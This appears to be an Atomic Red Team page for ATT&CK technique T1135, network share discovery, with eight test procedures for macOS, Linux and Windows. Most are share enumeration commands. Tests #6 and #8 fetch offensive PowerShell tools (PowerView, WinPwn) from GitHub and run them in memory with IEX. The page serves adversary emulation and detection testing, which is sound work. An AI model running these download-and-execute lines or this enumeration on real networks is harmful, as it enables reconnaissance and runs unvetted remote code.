T1135
Network Share Discovery
Description from ATT&CK
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) Net can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.
Atomic Tests
Atomic Test #1 - Network Share Discovery
Network Share Discovery
Supported Platforms: macos
auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
computer_name | Computer name to find a mount on. | string | computer1 |
Attack Commands: Run with sh!
1
2
3
4
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
Atomic Test #2 - Network Share Discovery - linux
Network Share Discovery using smbstatus
Supported Platforms: linux
auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
Inputs:
Name | Description | Type | Default Value | |||
---|---|---|---|---|---|---|
package_checker | Package checking command. Debian - dpkg -s samba | string | (rpm -q samba &>/dev/null) | (dpkg -s samba | grep -q installed) | |
package_installer | Package installer command. Debian - apt install samba | string | (which yum && yum -y install epel-release samba) | (which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba) |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
1
2
sudo smbstatus --shares
Dependencies: Run with bash!
Description: Package with smbstatus (samba) must exist on device
Check Prereq Commands:
1
2
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
Get Prereq Commands:
1
2
sudo #{package_installer}
Atomic Test #3 - Network Share Discovery command prompt
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session
Supported Platforms: windows
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
computer_name | Computer name to find a mount on. | string | localhost |
Attack Commands: Run with command_prompt!
1
2
net view \\#{computer_name}
Atomic Test #4 - Network Share Discovery PowerShell
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session
Supported Platforms: windows
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
Inputs:
None
Attack Commands: Run with powershell!
1
2
get-smbshare
Atomic Test #5 - View available share drives
View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session
Supported Platforms: windows
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
Inputs:
None
Attack Commands: Run with command_prompt!
1
2
net share
Atomic Test #6 - Share Discovery with PowerView
Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
Supported Platforms: windows
auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
Dependencies: Run with powershell!
Description: Endpoint must be joined to domain
Check Prereq Commands:
1
2
if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
"Join system to domain"
Atomic Test #7 - PowerView ShareFinder
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain.
Supported Platforms: windows
auto_generated_guid: d07e4cc1-98ae-447e-9d31-36cb430d28c4
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
parameters | ShareFinder parameter | string | -CheckShareAccess |
Attack Commands: Run with powershell!
1
2
3
Import-Module $env:TEMP\PowerView.ps1
Invoke-ShareFinder #{parameters}
Dependencies: Run with powershell!
Description: Invoke-ShareFinder module must exist in %TEMP% directory Check Prereq Commands:
1
if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1
Atomic Test #8 - WinPwn - shareenumeration
Network share enumeration using the shareenumeration function of WinPwn
Supported Platforms: windows
auto_generated_guid: 987901d1-5b87-4558-a6d9-cffcabc638b8
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput